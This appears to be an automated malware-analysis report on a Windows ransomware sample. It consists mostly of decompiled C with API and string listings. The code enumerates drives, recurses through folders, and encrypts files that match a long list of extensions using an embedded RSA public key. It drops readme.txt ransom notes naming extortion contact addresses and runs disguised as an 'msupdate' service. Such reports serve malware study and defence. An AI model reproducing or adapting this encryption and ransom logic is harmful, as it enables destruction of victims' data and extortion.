                                                              						_t169 =  &(_v5620.cFileName);
                                                              						_t260 = _t169 + 1;
                                                              						do {
                                                              							_t207 =  *_t169;
                                                              							_t169 = _t169 + 1;
                                                              						} while (_t207 != 0);
                                                              						if(_t169 - _t260 + _t235 >= 0x514) {
                                                              							goto L83;
                                                              						}
                                                              						E00C6BB40(_t260,  &_v84, 0, 0x32);
                                                              						_t276 = _t272 + 0xc;
                                                              						_t173 = _t201;
                                                              						_t38 = _t173 + 1; // 0x1
                                                              						_t244 = _t38;
                                                              						do {
                                                              							_t225 =  *_t173;
                                                              							_t173 = _t173 + 1;
                                                              						} while (_t225 != 0);
                                                              						if(_t173 - _t244 <= 0x32) {
                                                              							_t175 = _t201;
                                                              							_t39 = _t175 + 1; // 0x1
                                                              							_t245 = _t39;
                                                              							do {
                                                              								_t226 =  *_t175;
                                                              								_t175 = _t175 + 1;
                                                              								__eflags = _t226;
                                                              							} while (_t226 != 0);
                                                              							_t176 = _t175 - _t245;
                                                              							__eflags = _t175 - _t245;
                                                              							L23:
                                                              							E00C6A6C0( &_v84, _t201, _t176);
                                                              							_t277 = _t276 + 0xc;
                                                              							_t261 = 0;
                                                              							_t178 =  &_v84;
                                                              							_t235 = _t178 + 1;
                                                              							do {
                                                              								_t227 =  *_t178;
                                                              								_t178 = _t178 + 1;
                                                              							} while (_t227 != 0);
                                                              							if(_t178 == _t235) {
                                                              								L30:
                                                              								_t207 =  &_v84;
                                                              								_t180 = E00C6A360(".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA",  &_v84);
                                                              								_t272 = _t277 + 8;
                                                              								if(_t180 == 0) {
                                                              									goto L83;
                                                              								}
                                                              								_t207 = "readme.txt";
                                                              								_t181 =  &(_v5620.cFileName);
                                                              								while(1) {
                                                              									_t235 =  *_t181;
                                                              									if(_t235 !=  *_t207) {
                                                              										break;
                                                              									}
                                                              									if(_t235 == 0) {
                                                              										L36:
                                                              										_t181 = 0;
                                                              										L38:
                                                              										if(_t181 == 0) {
                                                              											goto L83;
                                                              										}
                                                              										E00C6BB40(_t261,  &_v2692, 0, 0x514);
                                                              										_t278 = _t272 + 0xc;
                                                              										_t183 = _t265;
                                                              										_t248 = _t183 + 1;
                                                              										do {
                                                              											_t228 =  *_t183;
                                                              											_t183 = _t183 + 1;
                                                              										} while (_t228 != 0);
                                                              										if( *((char*)(_t183 - _t248 + _t265 - 1)) == 0x5c) {
                                                              											L46:
                                                              											_t235 =  &(_v5620.cFileName);
                                                              											_push( &(_v5620.cFileName));
                                                              											_push(_t265);
                                                              											_push("%s%s");
                                                              											_push( &_v2692);
                                                              											L47:
                                                              											E00C69C35(_t261, _t265);
                                                              											_v8 = 0;
                                                              											_t207 =  &_v2692;
                                                              											_t187 = L00C6A96D( &_v2692, "rb+"); // executed
                                                              											_t272 = _t278 + 0x18;
                                                              											_t313 = _t187;
                                                              											if(_t187 != 0) {
                                                              												_push(_t187); // executed
                                                              												E00C6B1A7(_t201, _t235, _t261, _t265, _t313); // executed
                                                              												_t262 = _v5628;
                                                              												E00C6BB40(_v5628, _v5628, 0, 0x100000);
                                                              												E00C6BB40(_v5628, _v5632, 0, 0x100000);
                                                              												_t235 = _a12;
                                                              												_t201 = _v5636;
                                                              												E00B915D0(_v5636,  &_v2692, _a12, _t262, _v5632);
                                                              												_t272 = _t272 + 0x28;
                                                              											}
                                                              											_v8 = 0xfffffffe;
                                                              											goto L83;
                                                              										}
                                                              										_t192 = _t265;
                                                              										_t235 = _t192 + 1;
                                                              										do {
                                                              											_t229 =  *_t192;
                                                              											_t192 = _t192 + 1;
                                                              										} while (_t229 != 0);
                                                              										if( *((char*)(_t192 - _t235 + _t265 - 1)) == 0x2f) {
                                                              											goto L46;
                                                              										}
                                                              										_push( &(_v5620.cFileName));
                                                              										_push(_t265);
                                                              										_push("%s\\%s");
                                                              										_push( &_v2692);
                                                              										goto L47;
                                                              									}
                                                              									_t235 =  *((intOrPtr*)(_t181 + 1));
                                                              									if(_t235 != _t207[1]) {
                                                              										break;
                                                              									}
                                                              									_t181 = _t181 + 2;
                                                              									_t207 =  &(_t207[2]);
                                                              									if(_t235 != 0) {
                                                              										continue;
                                                              									}
                                                              									goto L36;
                                                              								}
                                                              								asm("sbb eax, eax");
                                                              								asm("sbb eax, 0xffffffff");
                                                              								goto L38;
                                                              							}
                                                              							do {
                                                              								_t196 = E00C6AFFA( *((char*)(_t267 + _t261 - 0x50)));
                                                              								_t277 = _t277 + 4;
                                                              								 *((char*)(_t267 + _t261 - 0x50)) = _t196;
                                                              								_t261 = _t261 + 1;
                                                              								_t197 =  &_v84;
                                                              								_t235 = _t197 + 1;
                                                              								do {
                                                              									_t231 =  *_t197;
                                                              									_t197 = _t197 + 1;
                                                              								} while (_t231 != 0);
                                                              							} while (_t261 < _t197 - _t235);
                                                              							goto L30;
                                                              						}
                                                              						_t176 = 0x32;
                                                              						goto L23;
                                                              						L83:
                                                              						_t253 = _v5644;
                                                              						_t130 = FindNextFileA(_t253,  &_v5620); // executed
                                                              					} while (_t130 != 0);
                                                              					if(_t253 != 0xffffffff) {
                                                              						_t130 = FindClose(_t253); // executed
                                                              					}
                                                              					goto L86;
                                                              				}
                                                              				_t199 = _t265;
                                                              				_t249 = _t199 + 1;
                                                              				do {
                                                              					_t232 =  *_t199;
                                                              					_t199 = _t199 + 1;
                                                              				} while (_t232 != 0);
                                                              				if( *((char*)(_t265 + _t199 - _t249 - 1)) == 0x2f) {
                                                              					goto L7;
                                                              				}
                                                              				_push("*.*");
                                                              				_push(_t265);
                                                              				_push("%s\\%s");
                                                              				_push( &_v5300);
                                                              				goto L8;
                                                              			}

                                                              0x00b918ed
                                                              0x00b918f8
                                                              0x00000000
                                                              0x00b918f8
                                                              0x00b9187b
                                                              0x00b91881
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91883
                                                              0x00b91886
                                                              0x00b9188b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9188b
                                                              0x00b91891
                                                              0x00b91893
                                                              0x00000000
                                                              0x00b91893
                                                              0x00b91820
                                                              0x00b91826
                                                              0x00b9182b
                                                              0x00b9182e
                                                              0x00b91832
                                                              0x00b91833
                                                              0x00b91836
                                                              0x00b91840
                                                              0x00b91840
                                                              0x00b91842
                                                              0x00b91843
                                                              0x00b91849
                                                              0x00000000
                                                              0x00b91820
                                                              0x00b917e0
                                                              0x00000000
                                                              0x00b91bc3
                                                              0x00b91bca
                                                              0x00b91bd1
                                                              0x00b91bd7
                                                              0x00b91be2
                                                              0x00b91be5
                                                              0x00b91be5
                                                              0x00000000
                                                              0x00b91be2
                                                              0x00b91700
                                                              0x00b91702
                                                              0x00b91705
                                                              0x00b91705
                                                              0x00b91707
                                                              0x00b91708
                                                              0x00b91713
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91715
                                                              0x00b9171a
                                                              0x00b9171b
                                                              0x00b91726
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              • .TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZI, xrefs: 00B91851
                                                              • %s%s, xrefs: 00B9172F, 00B91903, 00B91A1E
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a, xrefs: 00B91B61, 00B91B7A, 00B91B7D
                                                              • readme.txt, xrefs: 00B91866
                                                              • *.*, xrefs: 00B91715, 00B91729
                                                              • ., xrefs: 00B919AC
                                                              • /readme.txt, xrefs: 00B91B2D
                                                              • DESKTOP, xrefs: 00B91B06
                                                              • %s\%s, xrefs: 00B9171B, 00B918ED
                                                              • rb+, xrefs: 00B9191E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _memset$FileFindFirst_sprintf_strncpy_strrchr
                                                              • String ID: %s%s$%s\%s$*.*$.$.TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZI$/readme.txt$DESKTOP$Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a$rb+$readme.txt
                                                              • API String ID: 2919901432-1504518488
                                                              • Opcode ID: d512bddf7312ced5ff7fcd83f77945e49211336c6f24197214acf4e389f09e4a
                                                              • Instruction ID: a118ce3c2216d036821029c1e493abcf38dedb6bd7eb92132e5341a2e1031f3e
                                                              • Opcode Fuzzy Hash: d512bddf7312ced5ff7fcd83f77945e49211336c6f24197214acf4e389f09e4a
                                                              • Instruction Fuzzy Hash: 7DF1387190025A9FCF20CB68CC95FFA77F9EF81340F1849F8E4499B241EA719A49DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E00B91D10(void* __ecx, char __edx) {
                                                              				signed int _v8;
                                                              				char _v267;
                                                              				char _v268;
                                                              				intOrPtr _v276;
                                                              				signed int _v280;
                                                              				intOrPtr _v284;
                                                              				signed int _v288;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed int _t36;
                                                              				int _t38;
                                                              				intOrPtr _t42;
                                                              				signed int _t43;
                                                              				intOrPtr _t46;
                                                              				void* _t49;
                                                              				char* _t53;
                                                              				signed int _t58;
                                                              				long _t63;
                                                              				long _t66;
                                                              				intOrPtr _t67;
                                                              				intOrPtr* _t77;
                                                              				intOrPtr* _t81;
                                                              				signed int _t82;
                                                              				signed int _t85;
                                                              				char _t88;
                                                              				void* _t89;
                                                              				void* _t90;
                                                              				intOrPtr _t91;
                                                              				intOrPtr _t99;
                                                              				intOrPtr _t100;
                                                              				void* _t101;
                                                              				void* _t102;
                                                              				int _t104;
                                                              				signed int _t106;
                                                              				signed int _t109;
                                                              				void* _t110;
                                                              				void* _t113;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				signed int _t117;
                                                              				signed int _t118;
                                                              				signed int _t120;
                                                              				signed int _t122;
                                                              				void* _t123;
                                                              				void* _t124;
                                                              				void* _t127;
                                                              
                                                              				_t103 = __edx;
                                                              				_t90 = __ecx;
                                                              				_t120 = (_t118 & 0xfffffff8) - 0x11c;
                                                              				_t36 =  *0xcc5970; // 0x851ab4dd
                                                              				_v8 = _t36 ^ _t120;
                                                              				_t38 =  *0xcc9fac; // 0x0
                                                              				_t88 = 0;
                                                              				 *0xcc9f94 = 4;
                                                              				 *0xcc9f9c = 0;
                                                              				 *0xcc9fa8 = 0;
                                                              				 *0xcc9f98 = 1;
                                                              				 *0xcc9fa4 = 0;
                                                              				SetServiceStatus(_t38, 0xcc9f90);
                                                              				_v276 = E00BB2350(E00B92F00());
                                                              				_t42 = E00C69D40(_t90, _t127, 0x100011, 1); // executed
                                                              				_t112 = _t42;
                                                              				_v284 = _t112;
                                                              				_t43 = E00C69D40(_t90, _t127, 0x100011, 1); // executed
                                                              				_t109 = _t43;
                                                              				_v280 = _t109;
                                                              				E00B91000(_t90);
                                                              				_t91 =  *0xeca9a8; // 0x2921088
                                                              				_push(_t91);
                                                              				E00C69C35(_t109, _t112, "Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a", "Your file has been encrypted!\n\t\t\t\t\t\t If you want to decrypt, please contact us.\n\t\t\t\t\t\t %s\n\t\t\t\t\t\t And please send me the following hash!\n\t\t\t\t\t\t %s\n", 0xcc7360);
                                                              				_t122 = _t120 + 0x24;
                                                              				if(_t112 != 0 && _t109 != 0) {
                                                              					E00C6BB40(_t109, 0xcc9fb0, 0x41, 0x100000);
                                                              					_t123 = _t122 + 0xc;
                                                              					_v288 = 0;
                                                              					_t53 = "WINDIR";
                                                              					_t114 = 0;
                                                              					while(1) {
                                                              						_t131 =  *_t53 - _t88;
                                                              						if( *_t53 == _t88) {
                                                              							break;
                                                              						}
                                                              						_push(_t53);
                                                              						_t81 = E00C6B0AD(_t88, _t103, _t109, _t114, _t131);
                                                              						_t6 = _t114 + 0xec9fb0; // 0xec9fb0
                                                              						_t109 = _t6;
                                                              						_t123 = _t123 + 4;
                                                              						_t106 = _t109;
                                                              						do {
                                                              							_t100 =  *_t81;
                                                              							 *_t106 = _t100;
                                                              							_t81 = _t81 + 1;
                                                              							_t106 = _t106 + 1;
                                                              						} while (_t100 != 0);
                                                              						_t82 = _t109;
                                                              						_t115 = 0;
                                                              						_t7 = _t82 + 1; // 0xec9fb1
                                                              						_t103 = _t7;
                                                              						do {
                                                              							_t101 =  *_t82;
                                                              							_t82 = _t82 + 1;
                                                              						} while (_t101 != 0);
                                                              						if(_t82 != _t103) {
                                                              							do {
                                                              								 *((char*)(_t109 + _t115)) = E00C6AFFA( *((char*)(_t109 + _t115)));
                                                              								_t85 = _t109;
                                                              								_t123 = _t123 + 4;
                                                              								_t115 = _t115 + 1;
                                                              								_t10 = _t85 + 1; // 0xec9fb1
                                                              								_t103 = _t10;
                                                              								do {
                                                              									_t102 =  *_t85;
                                                              									_t85 = _t85 + 1;
                                                              								} while (_t102 != 0);
                                                              							} while (_t115 < _t85 - _t103);
                                                              						}
                                                              						_t117 = _v288 + 1;
                                                              						_v288 = _t117;
                                                              						_t114 = _t117 * 0xff;
                                                              						_t53 = _t114 + "WINDIR";
                                                              						if(_t53 != _t88) {
                                                              							continue;
                                                              						}
                                                              						break;
                                                              					}
                                                              					_v288 = _t88;
                                                              					_t112 = E00B967F0("-----BEGIN RSA PUBLIC KEY-----\nMIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPD\nwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1Izkq\nXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5\nH08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJUQ57w3jZpOnpFXSZoUy1YD7Y3Cu+n/Q\n6cEft6t29/FQgacXmeA2ajb7ssSbSntBpTpoyGc/kKoaihYPrHtNRhkMcZQayy5a\nXTgYtEjhzJAC+esXiTYqklWMXJS1EmUpoQIBAw==\n-----END RSA PUBLIC KEY-----\n", 0xffffffff);
                                                              					_v288 = E00B970B0(_t54,  &_v288, _t88, _t88);
                                                              					E00B94F50(_t54);
                                                              					_t58 = _v288;
                                                              					_t124 = _t123 + 0x1c;
                                                              					_t109 = _t58;
                                                              					if(_t58 == _t88) {
                                                              						_push("create rsa error\n");
                                                              						E00C6A7E4(_t88, _t103, _t109, _t112, __eflags);
                                                              					} else {
                                                              						_t63 = GetLogicalDrives(); // executed
                                                              						if(_t63 > 0) {
                                                              							_v268 = _t88;
                                                              							E00C6BB40(_t109,  &_v267, _t88, 0xfe);
                                                              							_t124 = _t124 + 0xc;
                                                              							_t103 =  &_v268;
                                                              							_t66 = GetLogicalDriveStringsA(0xff,  &_v268); // executed
                                                              							if(_t66 != 0) {
                                                              								do {
                                                              									_t67 =  *((intOrPtr*)(_t124 + _t88 + 0x20));
                                                              									if(_t67 < 0x43 || _t67 > 0x5a) {
                                                              										if(_t67 >= 0x63 && _t67 <= 0x7a) {
                                                              											goto L20;
                                                              										}
                                                              									} else {
                                                              										L20:
                                                              										E00C69C35(_t109, _t112,  &_v268, "%c:\\", _t67);
                                                              										_t112 = GetDriveTypeA;
                                                              										_t124 = _t124 + 0xc;
                                                              										_t103 =  &_v268;
                                                              										if(GetDriveTypeA( &_v268) != 5 && GetDriveTypeA( &_v268) != 0) {
                                                              											E00B91640(_t109,  &_v268, 1, _v276, _v284, _v280); // executed
                                                              											_t103 =  *((char*)(_t124 + _t88 + 0x38));
                                                              											_push("readme.txt");
                                                              											E00C69C35(_t109, GetDriveTypeA, "C:\readme.txt", "%c:\\%s",  *((char*)(_t124 + _t88 + 0x38)));
                                                              											_t112 = L00C6A96D("C:\readme.txt", "w+");
                                                              											_t124 = _t124 + 0x30;
                                                              											if(_t112 != 0) {
                                                              												_t77 = 0xdc9fb0;
                                                              												_t103 = 0xdc9fb1;
                                                              												do {
                                                              													_t99 =  *_t77;
                                                              													_t77 = _t77 + 1;
                                                              												} while (_t99 != 0);
                                                              												_push(_t112);
                                                              												_t78 = _t77 - 0xdc9fb1;
                                                              												_push(_t77 - 0xdc9fb1);
                                                              												_push(1);
                                                              												_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
                                                              												E00C6ADA3(_t88, 0xdc9fb1, _t109, _t112, _t78);
                                                              												_push(_t112);
                                                              												E00C6B1A7(_t88, 0xdc9fb1, _t109, _t112, _t78);
                                                              												_t124 = _t124 + 0x14;
                                                              											}
                                                              										}
                                                              									}
                                                              									_t88 = _t88 + 1;
                                                              								} while (_t88 < 0xff);
                                                              								_t88 = 0;
                                                              							}
                                                              						}
                                                              						E00B95630(_t109, _t109);
                                                              					}
                                                              					_push(_v280); // executed
                                                              					E00C69CB2(_t88, _t103, _t109, _t112, 0); // executed
                                                              					_push(_v284); // executed
                                                              					E00C69CB2(_t88, _t103, _t109, _t112, 0); // executed
                                                              					_t122 = _t124 + 0xc;
                                                              				}
                                                              				_t46 =  *0xeca9a8; // 0x2921088
                                                              				_t154 = _t46 - _t88;
                                                              				if(_t46 != _t88) {
                                                              					_push(_t46);
                                                              					E00C69CB2(_t88, _t103, _t109, _t112, _t154);
                                                              					_t122 = _t122 + 4;
                                                              				}
                                                              				_t104 =  *0xcc9fac; // 0x0
                                                              				 *0xcc9f94 = 1;
                                                              				 *0xcc9f9c = _t88;
                                                              				 *0xcc9fa8 = _t88;
                                                              				 *0xcc9f98 = 1;
                                                              				 *0xcc9fa4 = _t88;
                                                              				SetServiceStatus(_t104, 0xcc9f90);
                                                              				_t49 = E00B91C80();
                                                              				_pop(_t110);
                                                              				_pop(_t113);
                                                              				_pop(_t89);
                                                              				return E00C69C26(_t49, _t89, _v8 ^ _t122, _t104, _t110, _t113);
                                                              			}


                                                              0x00b91df0
                                                              0x00b91df2
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91df4
                                                              0x00b91df5
                                                              0x00b91dfa
                                                              0x00b91dfa
                                                              0x00b91e00
                                                              0x00b91e03
                                                              0x00b91e05
                                                              0x00b91e05
                                                              0x00b91e07
                                                              0x00b91e09
                                                              0x00b91e0a
                                                              0x00b91e0b
                                                              0x00b91e0f
                                                              0x00b91e11
                                                              0x00b91e13
                                                              0x00b91e13
                                                              0x00b91e16
                                                              0x00b91e16
                                                              0x00b91e18
                                                              0x00b91e19
                                                              0x00b91e1f
                                                              0x00b91e21
                                                              0x00b91e2b
                                                              0x00b91e2e
                                                              0x00b91e30
                                                              0x00b91e33
                                                              0x00b91e34
                                                              0x00b91e34
                                                              0x00b91e37
                                                              0x00b91e37
                                                              0x00b91e39
                                                              0x00b91e3a
                                                              0x00b91e40
                                                              0x00b91e21
                                                              0x00b91e48
                                                              0x00b91e49
                                                              0x00b91e4d
                                                              0x00b91e53
                                                              0x00b91e5b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91e5b
                                                              0x00b91e64
                                                              0x00b91e6e
                                                              0x00b91e7d
                                                              0x00b91e81
                                                              0x00b91e86
                                                              0x00b91e8a
                                                              0x00b91e8d
                                                              0x00b91e91
                                                              0x00b91fb7
                                                              0x00b91fbc
                                                              0x00b91e97
                                                              0x00b91e97
                                                              0x00b91e9f
                                                              0x00b91eb0
                                                              0x00b91eb4
                                                              0x00b91eb9
                                                              0x00b91ebc
                                                              0x00b91ec6
                                                              0x00b91ece
                                                              0x00b91ed4
                                                              0x00b91ed4
                                                              0x00b91eda
                                                              0x00b91ee2
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ef0
                                                              0x00b91ef0
                                                              0x00b91efe
                                                              0x00b91f03
                                                              0x00b91f09
                                                              0x00b91f0c
                                                              0x00b91f16
                                                              0x00b91f3e
                                                              0x00b91f43
                                                              0x00b91f48
                                                              0x00b91f58
                                                              0x00b91f6c
                                                              0x00b91f6e
                                                              0x00b91f73
                                                              0x00b91f75
                                                              0x00b91f7a
                                                              0x00b91f80
                                                              0x00b91f80
                                                              0x00b91f82
                                                              0x00b91f83
                                                              0x00b91f87
                                                              0x00b91f88
                                                              0x00b91f8a
                                                              0x00b91f8b
                                                              0x00b91f8d
                                                              0x00b91f92
                                                              0x00b91f97
                                                              0x00b91f98
                                                              0x00b91f9d
                                                              0x00b91f9d
                                                              0x00b91f73
                                                              0x00b91f16
                                                              0x00b91fa0
                                                              0x00b91fa1
                                                              0x00b91fad
                                                              0x00b91fad
                                                              0x00b91ece
                                                              0x00b91fb0
                                                              0x00b91fb0
                                                              0x00b91fc8
                                                              0x00b91fc9
                                                              0x00b91fd5
                                                              0x00b91fd6
                                                              0x00b91fdb
                                                              0x00b91fdb
                                                              0x00b91fde
                                                              0x00b91fe3
                                                              0x00b91fe5
                                                              0x00b91fe7
                                                              0x00b91fe8
                                                              0x00b91fed
                                                              0x00b91fed
                                                              0x00b91ff0
                                                              0x00b92001
                                                              0x00b92006
                                                              0x00b9200c
                                                              0x00b92012
                                                              0x00b92017
                                                              0x00b9201d
                                                              0x00b92023
                                                              0x00b9202f
                                                              0x00b92030
                                                              0x00b92031
                                                              0x00b9203c

                                                              APIs
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B91D60
                                                              • _calloc.LIBCMT ref: 00B91D7F
                                                                • Part of subcall function 00C69D40: __calloc_impl.LIBCMT ref: 00C69D55
                                                              • _calloc.LIBCMT ref: 00B91D91
                                                                • Part of subcall function 00B91000: _calloc.LIBCMT ref: 00B9100B
                                                                • Part of subcall function 00B91000: _calloc.LIBCMT ref: 00B9103A
                                                                • Part of subcall function 00B91000: _sprintf.LIBCMT ref: 00B91067
                                                              • _sprintf.LIBCMT ref: 00B91DB7
                                                              • _memset.LIBCMT ref: 00B91DDB
                                                              • _getenv.LIBCMT ref: 00B91DF5
                                                              • GetLogicalDrives.KERNELBASE ref: 00B91E97
                                                              • _memset.LIBCMT ref: 00B91EB4
                                                              • GetLogicalDriveStringsA.KERNEL32 ref: 00B91EC6
                                                              • _sprintf.LIBCMT ref: 00B91EFE
                                                              • GetDriveTypeA.KERNEL32(?), ref: 00B91F11
                                                              • GetDriveTypeA.KERNEL32(?), ref: 00B91F21
                                                              • _sprintf.LIBCMT ref: 00B91F58
                                                              • _printf.LIBCMT ref: 00B91FBC
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B9201D
                                                              Strings
                                                              • %c:\, xrefs: 00B91EF8
                                                              • %c:\%s, xrefs: 00B91F4E
                                                              • WINDIR, xrefs: 00B91DE7, 00B91DF4, 00B91E53
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a, xrefs: 00B91DB2, 00B91F75, 00B91F8A, 00B91F8D
                                                              • readme.txt, xrefs: 00B91F48
                                                              • |, xrefs: 00B91FC9
                                                              • create rsa error, xrefs: 00B91FB7
                                                              • -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU, xrefs: 00B91E5F
                                                              • C:\readme.txt, xrefs: 00B91F53, 00B91F62
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. %s And please send me the following hash! %s, xrefs: 00B91DAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _calloc_sprintf$Drive$LogicalServiceStatusType_memset$DrivesStrings__calloc_impl_getenv_printf
                                                              • String ID: %c:\$%c:\%s$-----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU$C:\readme.txt$WINDIR$Your file has been encrypted! If you want to decrypt, please contact us. %s And please send me the following hash! %s$Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a$create rsa error$readme.txt$|
                                                              • API String ID: 1688361723-3845174482
                                                              • Opcode ID: cab4c54e14dabea89e90d867c2babe9129826f1a7da3a8cb7f58ddb3a4940265
                                                              • Instruction ID: bdad4a8102aab13487491cb1e345f0ed0200ed1e59c819d3e010aebe473507c0
                                                              • Opcode Fuzzy Hash: cab4c54e14dabea89e90d867c2babe9129826f1a7da3a8cb7f58ddb3a4940265
                                                              • Instruction Fuzzy Hash: 158143B19043066FCB10AF68DC86FAAB7D8EB84704F08097DF888D7246EB75D8059792
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00B91C80() {
                                                              				void* _t1;
                                                              				int _t5;
                                                              				void* _t10;
                                                              				void* _t12;
                                                              
                                                              				_t1 = OpenSCManagerA(0, 0, 0xf003f); // executed
                                                              				_t10 = _t1;
                                                              				if(_t10 == 0) {
                                                              					return _t1;
                                                              				} else {
                                                              					_t12 = OpenServiceA(_t10, "msupdate", 0xf01ff);
                                                              					if(_t12 != 0) {
                                                              						DeleteService(_t12);
                                                              						 *0xcc9f94 = 1;
                                                              						 *0xcc9f98 = 1;
                                                              						_t5 =  *0xcc9fac; // 0x0
                                                              						 *0xcc9f9c = 0;
                                                              						 *0xcc9fa8 = 0;
                                                              						 *0xcc9fa4 = 0;
                                                              						SetServiceStatus(_t5, 0xcc9f90);
                                                              						CloseServiceHandle(_t12);
                                                              						return CloseServiceHandle(_t10);
                                                              					}
                                                              					return CloseServiceHandle(_t10);
                                                              				}
                                                              			}

                                                              APIs
                                                              • OpenSCManagerA.SECHOST(00000000,00000000,000F003F), ref: 00B91C8A
                                                              • OpenServiceA.ADVAPI32(00000000,msupdate,000F01FF), ref: 00B91CA2
